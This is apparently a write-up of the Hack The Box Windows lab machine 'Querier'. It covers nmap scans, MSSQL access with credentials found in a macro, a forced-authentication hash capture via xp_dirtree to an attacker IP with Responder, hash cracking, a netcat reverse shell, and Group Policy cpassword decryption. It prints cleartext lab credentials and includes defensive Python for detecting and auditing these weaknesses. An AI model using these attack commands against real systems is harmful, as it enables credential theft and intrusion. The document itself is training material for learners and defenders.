Querier

Operating system | Difficulty | Release date | Creator |
---|---|---|---|
Windows | Medium | 16 February 2019 | mrh4sh & egre55 |
Reconnaissance
We send an ICMP probe (ping) to the target machine to confirm that we have connectivity.
Initial enumeration
We run an nmap scan to discover which TCP ports are open on the target machine.
nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts 10.10.10.125 -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 19:40 -03
Initiating SYN Stealth Scan at 19:40
Scanning 10.10.10.125 [65535 ports]
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Completed SYN Stealth Scan at 19:41, 16.42s elapsed (65535 total ports)
Nmap scan report for 10.10.10.125
Host is up, received user-set (0.22s latency).
Scanned at 2025-02-04 19:40:50 -03 for 16s
Not shown: 65505 closed tcp ports (reset), 16 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
Raw packets sent: 79944 (3.518MB) | Rcvd: 68418 (2.737MB)
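To turn the greppable file that `-oG openPorts` writes into the comma-separated port list the service scan needs, here is a small parser. It is an added example, not part of the original writeup: `SAMPLE_OG` is a constructed, abridged version of what nmap writes for this host, and the function names are my own.

```python
"""Parse nmap greppable (-oG) output and build the port list for a follow-up -sCV scan.
Added example for this writeup; SAMPLE_OG is a constructed, abridged -oG file for the
host in the writeup, not the file the author saved."""
import re
from typing import Dict, List

# Constructed sample of what `-oG openPorts` writes (only some of the ports seen above).
SAMPLE_OG = (
    "# Nmap 7.94SVN scan initiated as: nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts 10.10.10.125\n"
    "Host: 10.10.10.125 ()\tStatus: Up\n"
    "Host: 10.10.10.125 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///, 5985/open/tcp//wsman///, "
    "47001/open/tcp//winrm///, 49664/open/tcp//unknown///\tIgnored State: closed (65505)\n"
    "# Nmap done at Tue Feb  4 19:41:06 2025 -- 1 IP address (1 host up) scanned in 16.50 seconds\n"
)

# One port entry in -oG output: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text: str) -> Dict[str, List[dict]]:
    """Return {host: [{'port': int, 'state': str, 'proto': str, 'service': str}, ...]}."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = line.split("\t")            # -oG separates the sections of a line with tabs
        host = fields[0].split()[1]          # "Host: 10.10.10.125 ()" -> "10.10.10.125"
        hosts.setdefault(host, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                m = PORT_RE.match(entry.strip())
                if m is None:
                    continue
                hosts[host].append({
                    "port": int(m.group(1)),
                    "state": m.group(2),
                    "proto": m.group(3),
                    "service": m.group(5),
                })
    return hosts


def open_ports(hosts: Dict[str, List[dict]], host: str, proto: str = "tcp") -> List[int]:
    """Sorted open ports for one host and protocol."""
    return sorted(p["port"] for p in hosts.get(host, [])
                  if p["state"] == "open" and p["proto"] == proto)


def build_service_scan(host: str, ports: List[int], outfile: str = "servicesScan") -> str:
    """The -sCV command line the writeup runs next, built from the parsed port list."""
    return f"nmap -sCV -p{','.join(str(p) for p in ports)} -oN {outfile} {host} -vvv"


if __name__ == "__main__":
    parsed = parse_grepable(SAMPLE_OG)
    for p in parsed["10.10.10.125"]:
        print(f"{p['port']:>6}/{p['proto']} {p['state']:<6} {p['service']}")
    print(build_service_scan("10.10.10.125", open_ports(parsed, "10.10.10.125")))
```

Running it against the real `openPorts` file (`parse_grepable(open("openPorts").read())`) reproduces the port list used in the `-sCV` command below without retyping fourteen numbers by hand.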
We run nmap's default enumeration scripts against the open ports to identify the service and version running on each one.
nmap -sCV -p135,139,445,1433,5985,47001,49664,49665,49666,49667,49668,49669,49670,49671 -oN servicesScan 10.10.10.125 -vvv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-04 19:42 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:42
Completed NSE at 19:42, 0.00s elapsed
Initiating Ping Scan at 19:42
Scanning 10.10.10.125 [4 ports]
Completed Ping Scan at 19:42, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:42
Completed Parallel DNS resolution of 1 host. at 19:42, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:42
Scanning 10.10.10.125 [14 ports]
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Completed SYN Stealth Scan at 19:42, 0.33s elapsed (14 total ports)
Initiating Service scan at 19:42
Scanning 14 services on 10.10.10.125
Service scan Timing: About 50.00% done; ETC: 19:44 (0:00:56 remaining)
Completed Service scan at 19:43, 56.16s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.10.125.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 9.28s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.65s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.01s elapsed
Nmap scan report for 10.10.10.125
Host is up, received echo-reply ttl 127 (0.15s latency).
Scanned at 2025-02-04 19:42:22 -03 for 66s
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2025-02-04T22:43:28+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-04T22:32:47
| Not valid after: 2055-02-04T22:32:47
| MD5: ef54:f6c5:8983:dfd8:ede9:87ce:3d7f:a0f1
| SHA-1: 2384:9561:cca0:c8ac:b8ef:fd48:8ead:3723:57a9:6690
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQXfkZtIMUyqdJthLo4Kxr5TANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMjA0MjIzMjQ3WhgPMjA1NTAyMDQyMjMyNDdaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAbElnH
| BUt09K11wCBBrHj2DeyawOg78LkgpZweMQ9fftPGxvA3p2WalNrWbam5KvXjU5pP
| 8BjZyw/z1kHmwPpSRRfgKPkRhAX6U07Ss0fgXJbfQRuFFAv+10mjEtF5TxWxzBO6
| u9xf8uHB+Ag0xWW9g7mv1rYgROttNR4rnG83V+L3UlQL0QZVuk9xtfdOCMhGah8n
| YtUuTxbuyfsdhoos+cqtfoYa1glF7mHS/mFmzWM1nBOZyVpNC2b+VGkHsEGvUKv2
| 0SnphLQlQuOH0lQP7Gp5Y/yVlKs2uxOFG38REwLShmfgmJ5ByDZ+rwAEjPH7Al8v
| q3Q3smMTyITIjhUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAcmoH7/+/yUcD+cfk
| MuJyVNdhzfZ69GL4bEPktYQSSWb9r7cBuBt2RvIqnyMtZoSKOYTQB7MH30QYdhv4
| +qB9OXnjLlQJs4NcrNT9D/XEz51eSrlAZtt3pWAifRXsOj3qzZprsc1JPfcImh93
| v9DAmdZqAeP38Qtqj7P/XzRVn9X/XUVhXeUa0XVGDQD1opkh0phlkBNsvVO1zfYo
| 82bYDcAK0zB6twM1K62xGZcTnbE4D5BUbWpyV3vzajxlhFztAYFtLWMYs20myNG9
| hlU1ZFTfBm7ddeKp1wbIsn2GgagXTaRCpAPyz7dTvXL0aNeHTsf1DGimFmx2Flk0
| cmptpA==
|_-----END CERTIFICATE-----
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-04T22:43:20
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10624/tcp): CLEAN (Couldn't connect)
| Check 2 (port 35010/tcp): CLEAN (Couldn't connect)
| Check 3 (port 40571/udp): CLEAN (Timeout)
| Check 4 (port 46213/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:43
Completed NSE at 19:43, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.19 seconds
Raw packets sent: 18 (768B) | Rcvd: 15 (644B)
Initial exploitation
SMB (445)
If we look at the macros, we find one that connects to the volume database.
reporting:PcwTWTHRwryjc$c6
If we try to enable xp_cmdshell, we get an error indicating that we don't have sufficient permissions.
This is because we don't have the sysadmin role.
But we can still try to read a file from a share and obtain the Net-NTLMv2 hash.
We start Responder.
responder -I tun0
We run the following command in the SQL console.
exec xp_dirtree '\\10.10.14.30\share\file'
This way we capture the hash.
We save the hash to a file and crack it with John.
Great, we obtained the credentials of the user mssql-svc.
mssql-svc:corporate568
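From the defender's side, the xp_dirtree trick works because the SQL Server service account will authenticate to any UNC path a low-privileged login names. The detection logic below is an added example (not from the writeup) that flags extended stored procedure calls reaching UNC hosts outside a trusted range, plus attempts to enable xp_cmdshell. The audit lines, the trusted subnet and the `.htb.local` suffix check are constructed assumptions for the example, not a real SQL Server Audit export.

```python
"""Flag SQL Server statements that would make the service account authenticate to an
untrusted UNC path (the behaviour the writeup abuses with xp_dirtree), plus attempts to
enable xp_cmdshell. Added example; SAMPLE_AUDIT is a constructed "<timestamp> <principal>
<statement>" export, not a real SQL Server Audit or Extended Events format."""
import ipaddress
import re
from typing import Dict, List

# Assumptions for this example: the database server's own subnet, and the AD DNS suffix
# (the suffix is the DNS_Domain_Name from the ms-sql-ntlm-info output above).
TRUSTED_NETS = [ipaddress.ip_network("10.10.10.0/24")]
TRUSTED_SUFFIX = ".htb.local"

# Constructed audit lines, one statement each.
SAMPLE_AUDIT = r"""
2025-02-04T22:45:01Z reporting exec xp_dirtree '\\10.10.14.30\share\file'
2025-02-04T22:45:07Z reporting SELECT name FROM volume.dbo.sales
2025-02-04T22:46:10Z backup_svc exec xp_fileexist '\\fileserver01.htb.local\backups\full.bak'
2025-02-04T22:47:33Z reporting EXEC sp_configure 'xp_cmdshell', 1
2025-02-04T22:48:02Z reporting exec master..xp_subdirs '\\10.10.14.30\share'
"""

# Procedures that take a path and make the server touch it with its own credentials.
XP_RE = re.compile(r"\bxp_(dirtree|fileexist|subdirs|cmdshell)\b", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([^\\\s']+)")        # host part of a \\host\share path
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.IGNORECASE)


def host_is_trusted(host: str) -> bool:
    """An IP inside a trusted subnet, or a hostname under the trusted DNS suffix."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:                        # not an IP literal: judge by DNS suffix
        return host.lower().endswith(TRUSTED_SUFFIX)
    return any(addr in net for net in TRUSTED_NETS)


def analyze(audit_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious statement, in audit order."""
    findings: List[Dict[str, str]] = []
    for line in audit_text.strip().splitlines():
        ts, principal, statement = line.split(" ", 2)
        if ENABLE_RE.search(statement):
            findings.append({"time": ts, "principal": principal, "host": "",
                             "reason": "attempt to enable xp_cmdshell"})
            continue
        if not XP_RE.search(statement):
            continue
        for host in UNC_RE.findall(statement):
            if not host_is_trusted(host):
                findings.append({"time": ts, "principal": principal, "host": host,
                                 "reason": "extended procedure reaching untrusted UNC host"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_AUDIT):
        print(f"{f['time']} {f['principal']:<12} {f['host']:<16} {f['reason']}")
```

In a real deployment the statements would come from a SQL Server Audit or Extended Events session rather than a text export, and the rule is most useful paired with egress filtering (the database server has no business opening SMB connections to arbitrary hosts) and with a review of which logins hold EXECUTE on these procedures at all.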
Enumeration / Lateral movement
We connect to the database.
We launch a reverse shell.
We create an SMB share to serve the netcat binary nc.exe.
impacket-smbserver -smb2support share .
We start a netcat listener on port 4444.
rlwrap nc -lnvp 4444
We run the following command.
We gain access to the system.
We read the user.txt flag.
Privilege escalation
We start an HTTP server with Python to
python3 -m http.server 80
We decrypt the password.
gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVD
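The cpassword that gpp-decrypt recovers is AES-encrypted with a key Microsoft published, so any domain user who can read SYSVOL can decrypt it; MS14-025 stopped new ones from being written but left existing files in place. As an added example (not from the writeup), this audit walks Group Policy Preference XML documents and reports every non-empty cpassword. The two documents are constructed samples in the Groups.xml and ScheduledTasks.xml layout, with placeholder paths, GUIDs and ciphertext, not files from the target.

```python
"""Audit Group Policy Preference XML for stored cpassword values (the weakness gpp-decrypt
exploits). Added example; SAMPLE_FILES holds constructed documents in the Groups.xml and
ScheduledTasks.xml layout with placeholder paths, GUIDs and ciphertext, not files from the box."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Placeholder SYSVOL location (assumption for the example).
SYSVOL = r"\\dc01.htb.local\SYSVOL\htb.local\Policies\{GUID-PLACEHOLDER}\Machine\Preferences"

# Constructed preference files keyed by path.
SAMPLE_FILES: Dict[str, str] = {
    SYSVOL + r"\Groups\Groups.xml": """
<Groups clsid="{CLSID-PLACEHOLDER}">
  <User clsid="{CLSID-PLACEHOLDER}" name="Administrator (built-in)" changed="2019-01-28 23:12:48">
    <Properties action="U" cpassword="CONSTRUCTED_CIPHERTEXT_1==" userName="Administrator (built-in)" neverExpires="1"/>
  </User>
  <User clsid="{CLSID-PLACEHOLDER}" name="helpdesk" changed="2019-02-01 10:00:00">
    <Properties action="U" cpassword="" userName="helpdesk"/>
  </User>
</Groups>
""",
    SYSVOL + r"\ScheduledTasks\ScheduledTasks.xml": """
<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <Task clsid="{CLSID-PLACEHOLDER}" name="nightly-backup" changed="2019-03-03 01:02:03">
    <Properties action="C" runAs="HTB\\backup_svc" cpassword="CONSTRUCTED_CIPHERTEXT_2==" name="nightly-backup"/>
  </Task>
</ScheduledTasks>
""",
}


def find_cpasswords(files: Dict[str, str]) -> List[Dict[str, str]]:
    """Every element carrying a non-empty cpassword, with the preference item it belongs to."""
    findings: List[Dict[str, str]] = []
    for path, xml_text in files.items():
        root = ET.fromstring(xml_text.strip())
        # ElementTree has no parent pointers, so build the map once per document.
        parent_of = {child: parent for parent in root.iter() for child in parent}
        for elem in root.iter():
            if not elem.get("cpassword"):     # attribute absent or empty: nothing stored
                continue
            item = parent_of.get(elem, root)
            findings.append({
                "path": path,
                "kind": root.tag,             # Groups, ScheduledTasks, Services, DataSources, ...
                "item": item.get("name", ""),
                "account": elem.get("userName") or elem.get("runAs") or elem.get("accountName", ""),
                "changed": item.get("changed", ""),
            })
    return findings


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_FILES):
        print(f"[{f['kind']}] {f['account']!r} in item {f['item']!r} (changed {f['changed']})")
        print(f"    {f['path']}")
```

A real audit walks `\\<domain>\SYSVOL\<domain>\Policies` recursively and feeds every XML file it finds to the same function, since Services.xml, DataSources.xml, Drives.xml and Printers.xml carry the same attribute. Removing the preference item is only half the fix: the credential must also be rotated, because any copy of the file already taken still decrypts.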
Post exploitation
We read the root flag.